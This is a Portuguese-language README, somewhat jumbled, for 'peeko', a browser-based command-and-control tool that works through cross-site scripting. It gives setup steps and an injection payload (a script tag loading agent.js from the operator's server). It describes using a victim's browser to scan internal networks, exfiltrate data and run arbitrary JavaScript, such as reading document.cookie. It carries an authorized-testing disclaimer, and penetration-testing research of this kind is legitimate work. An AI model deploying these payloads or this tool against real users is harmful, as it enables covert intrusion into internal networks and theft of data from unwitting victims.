
peeko – Browser-based XSS C2 for stealthy internal network exploration via infected browser.
Versão: v1.1
peeko é uma ferramenta de C2 (Comando e Controle) baseada em navegador e movida a XSS, que utiliza o navegador da vítima como um proxy furtivo dentro de redes internas.
Por meio de um payload XSS injetado, o peeko estabelece uma conexão WebSocket com um servidor central, permitindo que um atacante controle remotamente o navegador da vítima para enviar requisições a serviços internos, escanear redes, exfiltrar dados ou até mesmo executar JavaScript arbitrário — tudo sem soltar um único binário.
.txt ou .jsonClone o repositório:
git clone https://github.com/b3rito/peeko.git
cd peeko
Instale as dependências:
make install
(Opcional) Torne os scripts executáveis:
chmod +x gen-cert.sh start.sh
Gere o certificado TLS autoassinado:
make cert
Substitua o placeholder SERVER-IP:
Abra e edite os seguintes arquivos:
static/agent.jsstatic/control.htmlSubstitua SERVER-IP pelo IP/domínio do seu servidor:
wss://SERVER-IP:8443/ws → wss://192.168.30.136:8443/ws
Inicie o servidor:
make run
Abra o painel de controle no seu navegador:
192.168.1.0/24, 10.0.0.10-20, etc.80, 443,8000-8080)exec:... para enviarexec:alert(document.cookie);.txt ou .jsonAs políticas modernas dos navegadores afetam o que o peeko pode acessar.
| Cabeçalho | Consegue ler o conteúdo? | Observações |
|---|---|---|
Access-Control-Allow-Origin: * | ✅ | Acesso total à resposta |
| Sem cabeçalho | ⚠️ | A resposta é opaca |
A vítima se conecta via HTTPS. Se um alvo escaneado usar apenas HTTP:
http://Durante um teste de penetração, se você encontrar um serviço interno que responda com Access-Control-Allow-Origin: * e seja servido via HTTPS, o peeko se torna um proxy furtivo capaz de exfiltrar dados internos diretamente do navegador da vítima, sem soltar arquivos ou abrir conexões de saída.
peeko/
├── main.py → FastAPI WebSocket server
├── start.sh → Launch server
├── gen-cert.sh → Generate self-signed TLS certificate
├── Makefile → Install/run helpers
├── requirements.txt → Python dependencies
├── certs/ → TLS key and cert will be stored here
└── static/ → Browser client assets
├── control.html → Control panel (was attacker.html)
├── infect.html → Victim landing page
└── agent.js → Victim agent script
Esta ferramenta é fornecida apenas para fins educacionais e de testes autorizados.
Qualquer uso do peeko fora de ambientes onde você tenha permissão explícita é estritamente proibido.
Você é responsável pelas suas próprias ações.
Escrito por b3rito na mes3hacklab & GioPpeTto
https://192.168.30.136:8443/static/control.html
Injete o agente (exemplo de XSS):
<script src="https://192.168.30.136:8443/static/agent.js"></script>
| Origem restrita |
| ❌ |
| Bloqueada ou ilegível |